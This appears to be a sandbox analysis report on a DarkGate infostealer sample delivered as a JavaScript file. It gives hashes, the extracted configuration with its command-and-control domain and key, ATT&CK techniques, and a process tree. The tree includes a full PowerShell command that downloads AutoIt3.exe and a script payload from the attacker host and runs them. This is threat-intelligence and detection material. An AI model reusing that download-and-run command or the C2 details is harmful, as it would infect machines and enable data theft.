darkgate | ae0f7106f8b0e11c5526a8f1326c4705266a24cc933b5caa4dca735692cd959f

General

Target

GGGGGElicnse.js
Size

253KB
MD5

bb897b6af926de14bba7e9752318061a
SHA1

2dbd55f9cedb96553a18cb863e27b8d608cce40c
SHA256

ae0f7106f8b0e11c5526a8f1326c4705266a24cc933b5caa4dca735692cd959f
SHA512

9c0e544f9748339b1c6e480468f8d8fde1601ba9c2bf9c17c1d5858f640dc197ebd2dc93a78f3cb525f7bc8887ba45eb678e2dbbd52a3f9dbd65ae543672d09b
SSDEEP

6144:de7hgXeerjqlI2Iro+W8Bne7hgXeerjqlI2Iro+8:dIhgSlI23J8pIhgSlI23V

Score

10^/10

darkgate user_871236672 stealer

Malware Config

Extracted

Family

darkgate

Version

5.2.3

Botnet

user_871236672

C2

http://showmoreresultonliner.com

Attributes

alternative_c2_port
8080
anti_analysis
true
anti_debug
true
anti_vm
true
c2_port
2351
check_disk
true
check_ram
true
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
true
crypto_key
DDfcMjFaEKfNOW
internal_mutex
txtMut
minimum_disk
60
minimum_ram
6000
ping_interval
4
rootkit
true
startup_persistence
true
username
user_871236672

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	2072	powershell.exe
4	2072	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4820	AutoIt3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoIt3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoIt3.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2072	powershell.exe
2072	powershell.exe
2072	powershell.exe
2072	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2072	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4200 wrote to memory of 2072	4200	wscript.exe	71
PID 4200 wrote to memory of 2072	4200	wscript.exe	71
PID 2072 wrote to memory of 4820	2072	powershell.exe	73
PID 2072 wrote to memory of 4820	2072	powershell.exe	73
PID 2072 wrote to memory of 4820	2072	powershell.exe	73

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\GGGGGElicnse.js
1⤵
- Suspicious use of WriteProcessMemory
PID:4200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://showmoreresultonliner.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://showmoreresultonliner.com:2351/msiyfjjdsnw' -OutFile 'yfjjdsnw.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'yfjjdsnw.au3'"; Stop-Process -Name "WScript"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\tepp\AutoIt3.exe
    "C:\tepp\AutoIt3.exe" yfjjdsnw.au3
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:4820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mbojgotv.n1w.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\tepp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\tepp\yfjjdsnw.au3

Filesize
500KB

MD5
fe9e5fe5f346caa35bed17f44ae01aae

SHA1
aa5229f252f7a27ab39838dcea732c5a622ccfe7

SHA256
dff942a5e4e09480637208b09ee7ff4c6c4531981dc4f122baa29a63dd6fba66

SHA512
d52721bdf642ac9c26408102a19e22b7e9bc7efcdb15b9b66df646bacdb59001a0a5cc37ff5d8137e933a5c32367f4bcc8c2817c333ef19f5734711b683c8523

Download Submit
memory/2072-51-0x000001D436F20000-0x000001D436F30000-memory.dmp

Filesize
64KB

Download
memory/2072-23-0x000001D436F20000-0x000001D436F30000-memory.dmp

Filesize
64KB

Download
memory/2072-24-0x000001D436F20000-0x000001D436F30000-memory.dmp

Filesize
64KB

Download
memory/2072-29-0x000001D436F20000-0x000001D436F30000-memory.dmp

Filesize
64KB

Download
memory/2072-36-0x00007FF86C4A0000-0x00007FF86CE8C000-memory.dmp

Filesize
9.9MB

Download
memory/2072-4-0x000001D41E990000-0x000001D41E9B2000-memory.dmp

Filesize
136KB

Download
memory/2072-52-0x000001D436F20000-0x000001D436F30000-memory.dmp

Filesize
64KB

Download
memory/2072-21-0x00007FF86C4A0000-0x00007FF86CE8C000-memory.dmp

Filesize
9.9MB

Download
memory/2072-7-0x000001D4370B0000-0x000001D437126000-memory.dmp

Filesize
472KB

Download
memory/2072-59-0x00007FF86C4A0000-0x00007FF86CE8C000-memory.dmp

Filesize
9.9MB

Download
memory/4820-61-0x00000000013B0000-0x00000000017B0000-memory.dmp

Filesize
4.0MB

Download
memory/4820-62-0x0000000004590000-0x00000000048BA000-memory.dmp

Filesize
3.2MB

Download
memory/4820-63-0x0000000004590000-0x00000000048BA000-memory.dmp

Filesize
3.2MB

Download

Resubmissions

Analysis

Sharing